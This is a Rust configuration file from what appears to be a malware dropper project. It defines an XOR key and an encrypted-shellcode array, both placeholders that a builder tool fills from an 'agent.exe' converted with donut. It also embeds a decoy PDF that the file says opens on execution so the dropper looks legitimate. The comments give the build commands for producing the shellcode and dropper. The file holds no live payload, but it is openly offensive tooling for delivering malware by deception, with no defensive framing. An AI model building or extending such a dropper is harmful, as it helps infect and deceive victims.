//! Configuration module for the dropper
//! 
//! This file contains the embedded shellcode and XOR key.
//! It will be auto-generated by the builder tool with actual values.
//!
//! To generate shellcode from agent.exe:
//! 1. Use donut: donut.exe -i agent.exe -o shellcode.bin
//! 2. Use builder: ./builder build-dropper --shellcode shellcode.bin --output dropper.exe

// ============================================================================
// SHELLCODE CONFIGURATION
// ============================================================================
// These values will be replaced by the builder tool

/// XOR key for decrypting the shellcode
/// This should be randomly generated for each build
pub const XOR_KEY: &[u8] = b"PLACEHOLDER_KEY_32_BYTES_LONG!!";

/// XOR-encrypted shellcode (generated from agent.exe via donut)
/// This is a placeholder - will be replaced by the builder
pub const ENCRYPTED_SHELLCODE: &[u8] = &[];

// ============================================================================
// DECOY DOCUMENT
// ============================================================================

/// Embedded PDF decoy data (minimal valid PDF)
/// This PDF will be opened when the dropper executes to look legitimate
pub const DECOY_PDF_DATA: &[u8] = include_bytes!("decoy.pdf");

// If no decoy.pdf exists at compile time, use empty
// The build process should create a minimal PDF or use a real one

